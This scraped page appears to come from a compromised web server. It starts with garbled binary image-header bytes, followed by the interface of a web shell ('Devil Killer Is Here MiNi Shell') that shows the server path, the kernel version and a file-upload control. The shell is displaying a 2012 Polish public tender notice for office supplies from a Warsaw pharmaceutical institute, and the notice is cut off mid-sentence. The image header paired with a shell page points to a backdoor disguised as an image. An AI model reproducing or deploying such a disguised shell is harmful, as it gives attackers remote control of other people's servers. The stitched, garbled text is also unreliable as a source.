JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120228/59942-N-2012.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów biurowych</b><br>
<b>Numer ogłoszenia: 59942 - 2012; data zamieszczenia: 28.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Farmaceutyczny , ul. Rydygiera 8, 01-793 Warszawa, woj. mazowieckie, tel. 022 4563866, faks 022 4563879.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ifarm.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka badawczo-rozwojowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa wymienionych w tabeli z nazwy i ilości artykułów biurowych :

1.	Blok makulaturowy (klejony po krótszym boku) A4 kratka 
100 kartkowy. 	20 sztuk
2.	Cienkopisy (6 kolorów w komplecie). Cienkopisy posiadają plastikową końcówkę oprawioną w metal, grubość linii 0,4mm. 	10 kompletów
3.	Cienkopisy (10 kolorów w komplecie). Cienkopisy posiadają plastikową końcówkę oprawioną w metal, grubość linii 0,4mm. 	10 kompletów
4.	Długopisy w przezroczystej obudowie na wymienne wkłady, długość linii pisania 1700m,  skuwka z klipsem, różne kolory .	400 sztuk
5.	Długopisy żelowe w przezroczystej obudowie na wymienne wkłady, długość linii pisania 600m,  różne kolory	200 sztuk
6.	Druki k-157 Likwidacja środka trwałego	10 bloczków
7.	Druki KP-kasa przyjmie samokopiujące	60 bloczków
8.	Druki KW-kasa wypłaci samokopiujące	60 bloczków
9.	Druki Pw-wielopozycyjne wąskie samokopiujące (Pu Gm-114a S)	30 bloczków
10.	Druki Pz-wielopozycyjne wąskie samokopiujące (Pu Pz S)	30 bloczków
11.	Druki  Praca w godzinach nadliczbowych	20 bloczków
12.	Druki Polecenie wyjazdu służbowego	20 bloczków
13.	Druki Polecenie przelewu k-101-wpłata gotówki 4-odcinkowy samokopiujący	60 bloczków
14.	Druki Rw - jednopozycyjne wąskie samokopiujące (Pu Gm-121 122a S)	80 bloczków
15.	Druki Rw- wielopozycyjne wąskie samokopiujące (Pu Gm-121a S)	80 bloczków
16.	Druki Wz- wielopozycyjne wąskie samokopiujące (Pu Gm-120a S)	20 bloczków
17.	Druki Rozliczenie zaliczki format A6	10 bloczków
18.	Druki Raport kasowy format A4 (140-1)	10 bloczków
19.	Druki k151/S OT format A5 samokopiujące	50 bloczków
20.	Druki Zw- wielopozycyjne samokopiujące (Pu Gm 112a S)	20 bloczków
21.	Druki upoważnień Os5	5 bloczków
22.	Dyskietki 2HD 3,5,  sformatowane, pojemność 1,44 MB, z dodatkowym zabezpieczeniem nośnika przed uszkodzeniem.  (opakowanie 10 szt. )	5 opak.
23.	Dziurkacz metalowy z plastikowymi wykończeniami dziurkujący do 25 kartek, śr. dziurek 5,5 mm, posiadający ogranicznik formatu oraz łatwy do opróżnienia pojemnik, anty poślizgowa, plastikowa nakładka zabezpieczająca przed rysowaniem mebli (różne kolory)	20 sztuk
24.	Folia do drukarek laserowych A4 (op.50sztuk) 	20 opak.
25.	Folia do drukarek atramentowych A4 (op.50sztuk)	20 opak.
26.	Folia do drukarek jednobarwnych A4 (op.20sztuk)	10 opak.
27.	Foliopisy (markery) S-0,3mm, F-0,6mm, M-1mm do folii z odpornym na działanie światła i wody tuszem o wysokim stopniu przezroczystości .	70 sztuk
28.	Foliopisy , niezmywalny tusz, S-0,4 mm, F-0,7 mm, M-1,0 mm, różne kolory	70 sztuk
29.	Gilotyna biurowa z ostrzem ze stali nierdzewnej, jednorazowo tnąca min. 10 arkuszy (80g) , podstawa z antypoślizgowymi nóżkami, z automatycznym dociskiem  papieru i miarkami cięcia dla różnych rozmiarów arkuszy papieru, przystosowana do cięcia pod kątem, z certyfikatem bezpieczeństwa  zapewniającym bezpieczeństwo pracy	 2 sztuki
30.	Gumki do ścierania grafitu z papieru, nie niszczące ścieraną powierzchnię, ścierające na czysto	30 sztuk
31.	Gumki recepturki (op.100g)	30 opak.
32.	Karteczki samoprzylepne  38 x 51 różne kolory	500 bloczków
33.	Karteczki samoprzylepne  50 x 76 różne kolory	100 bloczków
34.	Karteczki samoprzylepne 76 x 76 różne kolory	250 bloczków
35.	Karteczki samoprzylepne 76 x 127 różne kolory	150 bloczków
36.	Karteczki samoprzylepne indeksujące 4 kolory po 50 szt.,  20 x 50mm	100 opak.
37.	Klej w sztyfcie 17g do tektury i papieru, hermetycznie zamykany, łatwo zmywalny wodą.	70 sztuk
38.	Klej w płynie do papieru, szybko schnący, ze specjalnym siateczkowym aplika torem, hermetycznie zamykany, poj.40 ml.	100 sztuk
39.	Klipsy biurowe do papieru 19 mm (op.12 szt.) 	50 opak.
40.	Klipsy biurowe do papieru 25 mm (op.12 szt.)	50 opak.
41.	Klipsy biurowe do papieru 32 mm (op.12 szt.)	50 opak.
42.	Klipsy biurowe do papieru 41 mm (op.12 szt.)	50 opak.
43.	Klipsy biurowe do papieru 51 mm (op.12 szt.)	50 opak.
44.	Kołonotatnik A5 80 kartkowy w kratkę z mikroperforacją oraz 4 otworami umożliwiającymi wpięcie do segregatora, gramatura papieru wewnątrz 80g m2, okładki -lakierowana tektura	80 sztuk
45.	Kołonotatnik A4 80 kartkowy w kratkę z mikroperforacją oraz 4 otworami umożliwiającymi wpięcie do segregatora, gramatura papieru wewnątrz 80g m2, okładki -lakierowana tektura	80 sztuk
46.	Koperty białe z rozszerzanymi bokami i spodem RBD z samoklejącym paskiem, B4 (250x353x3,8) 	5000 sztuk
47.	Koperty białe  z samoklejącym paskiem  C6(114 x 162) 	5000 sztuk
48.	Koperty białe z samoklejącym paskiem  C5(162 x 229)	5000 sztuk
49.	Koperty białe z samoklejącym paskiem  C4(229 x 324) 	5000 sztuk
50.	Koperty białe z samoklejącym paskiem  B5(176 x 250) 	5000 sztuk
51.	Koperty białe z samoklejącym paskiem  B4(250 x 353) 	5000 sztuk
52.	Koperty białe z samoklejącym paskiem  DL(110 x 220) bez okienka 5000 sztuk
53.	Koperty z rozszerzanymi bokami i spodem RBD z samoklejącym pakiem B4 (250x353x3,8) 	5000 szt
54.	Korektor w okrągłym piórze zawierający 7ml wielofunkcyjnego szybkoschnącego płynu korygującego z metalową końcówką zaworkową  50 sztuk
55.	Korektor w taśmie na wymienne wkłady, długość taśmy min.10 m,   szerokość taśmy 4,2mm	60 sztuk
56.	Koszulki poszerzane A4 maxi groszkowe, wykonane z folii P120 mic multiperforowane (op. 100 szt) 	100 opak.
57.	Koszulki A4 krystaliczne wykonane z wysoko krystalicznej folii PP multiperforowane , 55 mic. (op.100 sztuk) 150 opak.
58.	Koszulki A4 groszkowe wykonane z groszkowej wysoko krystalicznej folii PP multiperforowane, 48 mic (op.100sztuk) 350 opak.
59.	Koszulki A4 przezroczyste z bocznym zamknięciem (op.10sztuk) 150 opak.
60.	Koszulki poszerzane A4 groszkowe, z metalową krawędzią, otwierane u góry, wykonane z folii P170 mic,  multiperforowane (op. 3 szt) 	15 opak.
61.	Koszulki poszerzane A4 groszkowe, z klapką, otwierane u góry, wykonane z folii P170 mic,  multiperforowane (op. 5 szt) 	10 opak.
62.	Koszulki A5 (op.100sztuk) 	10 opak.
63.	Książka do podpisu na  dokumenty A4, okładki z twardego kartonu pokrytego folią PP, 20 przegródek wewnętrznych każda z trzema otworami do podglądu zawartości, rozciągliwy grzbiet	5 sztuk
64.	Linijka przezroczysta plastikowa 30cm	20 sztuk
65.	Linijka przezroczysta plastikowa 50cm	20 sztuk
66.	Notatnik kostka klejona i nie klejona biała i kolorowa 8,5 x 8,5cm 50 sztuk
67.	Nożyczki ze stali nierdzewnej, wysokiej jakości, posiadają plastikową rączkę odporną na pęknięcia i odpryski w ergonomicznym kształcie ostrze16cm	20 sztuk
68.	Nożyczki ze stali nierdzewnej, wysokiej jakości, posiadają plastikową rączkę odporną na pęknięcia i odpryski w ergonomicznym kształcie ostrze 21cm	20 sztuk
69.	Markery permanentne grube okrągła końcówka, kolory: czarny, granat, zielony, czerwony.	50 sztuk
70.	Markery szerokość linii pisania 1,5-3mm z okrągłą końcówką permanentne do pisania na różnych rodzajach powierzchni (szkle, plastiku, metalu) szybkoschnące, nie plamiące, wysoce odporne na działanie światła oraz wody, nieścieralne, ekonomiczne-bez dodatku toluenu i ksylenu, . kolory: czarny, granat, zielony, czerwony. 	50 sztuk
71.	Markery permanentne, ścięta końcówka , do pisania po metalu, szkle, plastiku, gumie, grubym papierze i drewnie, grubość linii pisania 1,2mm, kolory: czarny, granat, zielony, czerwony	30 sztuk
72.	Markery permanentne, okrągła końcówka , do pisania po metalu, szkle, plastiku, gumie, grubym papierze i drewnie, grubość linii pisania 1,5mm, kolory: czarny, granat, zielony, czerwony.	30 sztuk
73.	Okładki do bindowania z przezroczystej bezbarwnej folii, format A4 200mic.	10 opak.
74.	Okładki do bindowania z kartonu skóropodobnego format A4 o gramaturze 250g m2	10 opak.
75.	Ołówek HB automatyczny z wymienną gumką, grafit 0,5 mm, z gumowym uchwytem, różne kolory	70 sztuk
76.	Papier A4 gramatura 80g m2 różne kolory	20 ryz
77.	Pinezki tablicowe kolorowe beczułki (op. 50 sztuk)	30 opak.
78.	Plastelina 6 kolorów w opakowaniu	10 opak.
79.	Płyty CD-R 700MB cienkie - dysk kompaktowy jednokrotnego zapisu, umożliwia zapis danych o pojen.700 MB ( 80 min. nagrania dźwiękowego, prędkość zapisu 52x. (opakowanie 10 szt. ) 	40 opak.
80.	Płyty DVD+R cienkie - dysk jednokrotnego zapisu, pojemność 4,7 MB, prędkość zapisy 16x. (opakowanie 10 szt. )	            25 opak.
81.	Pojemniki A4 PCV składane na katalogi różne kolory	20 sztuk
82.	Pióra kapilarne ze wzmocnioną, cienko piszącą końcówką igłową, tusz pigmentowy, wodoodporny o konsystencji płynnego żelu , linia pisania 0,3mm x 2500m,  skuwka z metalowym klipsem:  różne kolory	50 sztuk
  83.	Pióro żelowe w przezroczystej oprawie z gumowym uchwytem i wymiennymi wkładami. Grubość linii pisania 0,3mm , długość linii pisania 600m. 	100 sztuk
  84.	Pióro żelowe automatyczne  w przezroczystej oprawie z gumowym uchwytem i wymiennymi wkładami. Grubość linii pisania 0,3mm , długość linii pisania 800m. 	100 sztuk
  85.	Pióro kulkowe termiczne z wymiennym wkładem, ścieralne, grubość linii pisania 0,35mm,  różne kolory	20 sztuk
  86.	Wkłady do pióra kulkowego termicznego, ścieralnego, grubość linii pisania 0,35mm,  różne kolory	100 sztuk
  87.	Pióro kulkowe,  różne kolory	20 sztuk
  88.	Pudełka archiwizacyjne Boxy A4 10cm i 15 cm	150 sztuk
  89.	Przekładki kartonowe gramatura 160g m2 A4 5 kolorów z kartą informacyjno-opisową i z dziurkami umożliwiającymi wpięcie do segregatora 	30 opak.
  90.	Przekładki kartonowe gramatura 160g m2 A4 10 kolorów z kartą informacyjno-opisową i z dziurkami umożliwiającymi wpięcie do segregatora	40 opak.
  91.	Przekładki kartonowe 1 3 A4 gramatura 210g z dziurkami umożliwiającymi wpięcie do segregatora pionowo i poziomo, różne kolory (op.100szt)	50 opak.
 92.	Przekładki kartonowe alfabetyczne A4 A-Z z dziurkami umożliwiającymi wpięcie do segregatora	20 opak.
 93.	Rolki offsetowe 57 S do sumatorów	64 sztuki
 94.	Segregatory A4 50mm wykonane z kartonu pokrytego na zewnątrz poliolefiną a wewnątrz papierem, z mechanizmem i z listwą wzmacniającą u dołu oraz dwustronną etykietą na grzbiecie i otworem na palec, różne kolory	250 sztuk
 95.	Segregatory A4 70mm wykonane z kartonu pokrytego na zewnątrz poliolefiną a wewnątrz papierem, z mechanizmem i z listwą wzmacniającą u dołu oraz dwustronną etykietą na grzbiecie i otworem na palec z mechanizmem i z listwą wzmacniającą u dołu, różne kolory  (w tym, koniecznie: pomarańczowe, szare, fioletowe, czarne po min. 20 szt.)	350 sztuk
 96.	Segregatory A5 75mm wykonane z kartonu pokrytego na zewnątrz poliolefiną a wewnątrz papierem, z mechanizmem i z listwą wzmacniającą u dołu oraz dwustronną etykietą na grzbiecie i otworem na palec z mechanizmem i z listwą wzmacniającą u dołu, różne kolory	20 sztuk
 97.	Skoroszyty A4 z mocnego i sztywnego PCV zawieszane wyposażone w boczną perforacją umożliwiającą wpięcie do segregatora. Przednia okładka przezroczysta, tylna kolorowa, posiadają wymienny pasek do opisu oraz zaokrąglone rogi obu okładek. Długość wąsów min. 17 cm. Różne kolory	1500 sztuk
 98.	Skoroszyty A4 z mocnego i sztywnego PCV, bez bocznej perforacji. Przednia okładka przezroczysta, tylna kolorowa, posiadają wymienny pasek do opisu oraz zaokrąglone rogi obu okładek. Długość wąsów min. 17 cm. Różne kolory	300 sztuk
 99.	Spinacze metalowe okrągłe 28mm (opak.100 szt) 	100 opak.
100.	Spinacze metalowe okrągłe 50mm (opak.100 szt)	50 opak.
101.	Szuflady (tacki) podłużne na dokumenty A4, wykonane z polistyrenu, przezroczyste i dymne	80 sztuk
102.	Taśma samoprzylepna przezroczysta 19mm x 33 m	60 sztuk
103.	Taśma samoprzylepna matowa 19mm x 33m	60 sztuk
104.	Taśma dwustronnie klejąca 50mm x 25 m	10 sztuk
105.	Podajnik do taśmy samoprzylepnej o wymiarach 19 mmx 33 m, w czarnym kolorze, stabilny	10 sztuk
106.	Podajnik do taśmy samoprzylepnej o wym. 19 mmx 33 m, stabilny w czarnym kolorze	5 sztuk
107.	Taśma pakowa mocna - wytrzymała na zerwanie, brązowa 48mm x 50m	120 sztuk
108.	Taśma pakowa mocna - wytrzymała na zerwanie, przezroczysta 48mm x 50m	100 sztuk
109.	Teczki tekturowe z gumkami narożnymi w formacie A4 wykonane z mocnego kartonu. Posiadają dwie narożne gumki oraz trzy zakładki chroniące dokumenty przed wypadnięciem. Różne kolory. 	200 sztuk
110.	Teczki tekturowe na dokumenty w formacie A4 wykonane z mocnego kartonu 400g m2 barwionego i lakierowanego z jednej strony. Teczki posiadają mocną gumkę oraz trzy zakładki chroniące dokumenty przed wypadnięciem. 	300 sztuk
111.	Teczki tekturowe białe wiązane 250 g	500 sztuk
112.	Tusz do stempli gumowych, czarny	10 sztuk
113.	Wkłady do segregatora A4/80 kartkowe w kratkę białe	100 sztuk
114.	Wkłady 0,5 HB do ołówków automatycznych (op.12sztuk)	50 opak.
115.	Zakładki indeksujące samo przylepne 4 kolory 25 x 43mm	60 opak.
116.	Zakładki indeksujące samo przylepne 4 kolory 12 x 43mm	30 opak.
117.	Zakreślacze fluorescencyjne zawierające tusz na bazie wody, grubość linii pisania 2-5mm , końcówki ścięte (6 kolorów w komplecie) 	35 kompletów
118.	Zeszyty A4 96 kartkowe kratka twarda oprawa	150 sztuk
119.	Zeszyty A4 196 kartkowe kratka twarda oprawa	150 sztuk
120.	Zeszyty A5 96 kartkowe kratka twarda oprawa	150 sztuk
121.	Zeszyty A5 60 kartkowe kratka	70 sztuk
122.	Zeszyty A5 32 kartkowe kratka	50 sztuk
123.	Zeszyty A5 16 kartkowe kratka	30 sztuk
124.	Zszywacz metalowy w plastikowej obudowie, głębokość zszywania do 45 mm, pojemność zszywek 100 x 24,6	20 sztuk
125.	Zszywacz metalowy w plastikowej obudowie, głębokość zszywania od 55 do 65 mm, pojemność zszywek 100x No 10	20 sztuk
126.	Zszywki 24 6 (op.1000sztuk)  (pasujące do zszywaczy LEITZ)	50 opak.
127.	Zszywki No10 (op.1000sztuk)	30 opak.
128.	Zszywki 23 20 (op.1000 sztuk)	20 opak.
129.	Etykiety białe opak.25 arkuszy, wymiary 38 mm x 21,2 mm 10 opak.
130.	Etykiety białe opak.25 arkuszy, wymiary 63,5 mm x 33,9 mm 10 opak.
131.	Etykiety białe opak.25 arkuszy, wymiary 66 mm x 37,8 mm 10 opak
132.	Etykiety białe opak.25 arkuszy, wymiary 70 mm x 37 mm 	10 opak
133.	Etykiety białe opak.25 arkuszy, wymiary 97 mm x 42 mm	10 opak
134.	Etykiety białe opak.25 arkuszy, wymiary 97 mm x 67 mm	10 opak
135.	Etykiety białe opak.25 arkuszy, wymiary 105 mm x 57 mm	10 opak
136.	Etykiety białe opak.25 arkuszy, wymiary 210 mm x 297 mm 10 opak
137.	Brulion, twarda okładka, 96 kartek	50 sztuk.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.00.00-7, 30.19.72.00-8, 30.19.21.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> brak</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki dotycząceposiadania wiedzy i doświadczenia, tj.: Wykonawca wykonał, a w przypadku umów o charakterze ciągłym wykonuje (z zastrzeżeniem, że wykazywana umowa już została wykonana w zakresie wartości wymaganej treścią niniejszego warunku) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej trzy dostawy artykułów biurowych o wartości brutto nie mniejszej niż 50.000 zł.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczeniową nie mniejszą niż: 15.000 zł PLN każda.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony Formularz ofertowy z wykorzystaniem wzoru stanowiącego Załącznik Nr 1 do SIWZ;
2)	wypełniony Formularz cenowy z wykorzystaniem wzoru stanowiącego Załącznik Nr 2 do SIWZ;
3) oświadczenie o podwykonawcach - z wykorzystaniem wzoru stanowiącego Załącznik Nr 6 do SIWZ. W przypadku przewidzenia udziału podwykonawców, Wykonawca zobowiązany jest załączyć do oferty wypełnione i podpisane ww. oświadczenie z zakresem zamówienia jakie Wykonawca planuje powierzyć Podwykonawcy. Brak dołączenia do oferty ww. oświadczenia Zamawiający uzna za potwierdzenie, że Wykonawca wykona całość prac bez udziału podwykonawców.
4) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium  Rzeczypospolitej Polskiej, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.
c) Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
5)	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
6)	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
7)	Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub potwierdzających, że oferowane dostawy spełniają wymagania określone przez Zamawiającego lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie chyba, że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu, albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez Wykonawcę warunku udziału w postępowaniu oraz spełnienie przez oferowane 